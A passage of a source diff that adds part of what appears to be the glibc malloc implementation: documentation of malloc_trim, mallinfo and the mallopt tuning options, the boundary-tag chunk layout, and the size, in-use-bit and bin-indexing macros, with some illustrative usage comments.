+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
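+
+/* Illustrative usage (not part of the implementation) reading a few of the
+   fields documented above (all of them are plain ints):
+
+     struct mallinfo mi = mallinfo ();
+     printf ("non-mmapped bytes from system: %d\n", mi.arena);
+     printf ("free chunks:                   %d\n", mi.ordblks);
+     printf ("bytes in mmapped regions:      %d\n", mi.hblkhd);
+     printf ("trimmable bytes (ideal):       %d\n", mi.keepcost);
+*/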
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
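+
+/* Illustrative usage (not part of the implementation); after freeing a large
+   amount of memory, a pad of 0 asks the allocator to give back as much of
+   the top of the heap as it can ("big_buffer" is a hypothetical allocation):
+
+     free (big_buffer);
+     if (malloc_trim (0))
+       puts ("some memory was returned to the system");
+*/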
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than the page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; when handing out mmapped memory the kernel simply
+  has no choice but to zero it.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64-bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
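+
+/* A worked example of the conversions above (illustrative only), assuming
+   SIZE_SZ == 8: the user pointer sits 2 * SIZE_SZ == 16 bytes past the start
+   of the chunk, i.e. just after the prev_size and size fields.
+
+     mchunkptr p   = ...;                 // some chunk header
+     void     *mem = chunk2mem (p);       // == (char *) p + 16
+     assert (mem2chunk (mem) == p);       // the inverse mapping
+*/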
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
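+
+/* Worked examples of request2size (illustrative only), assuming the typical
+   64-bit values SIZE_SZ == 8, MALLOC_ALIGN_MASK == 15 and MINSIZE == 32:
+
+     request2size (0)   ==  32   (0 + 8 + 15 < 32, so MINSIZE)
+     request2size (24)  ==  32   ((24 + 8 + 15) & ~15)
+     request2size (25)  ==  48   ((25 + 8 + 15) & ~15)
+     request2size (100) == 112   ((100 + 8 + 15) & ~15)
+
+   i.e. one size word of overhead is added and the result is rounded up to a
+   multiple of MALLOC_ALIGNMENT, but never below MINSIZE.  */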
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
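+
+/* An illustrative fragment (not part of the implementation) showing how the
+   boundary-tag macros above fit together: a chunk's own in-use state lives in
+   the PREV_INUSE bit of the *next* chunk's size field, so inuse(p) peeks
+   chunksize(p) bytes ahead, while prev_inuse(p) reads p's own size field.
+
+     mchunkptr p = ...;            // some non-mmapped chunk
+     if (inuse (p))                // next chunk's PREV_INUSE bit is set
+       ...;                        // p is currently allocated
+     if (!prev_inuse (p))          // p's own PREV_INUSE bit is clear
+       ...;                        // prev_size (p) and prev_chunk (p) are valid
+*/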
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
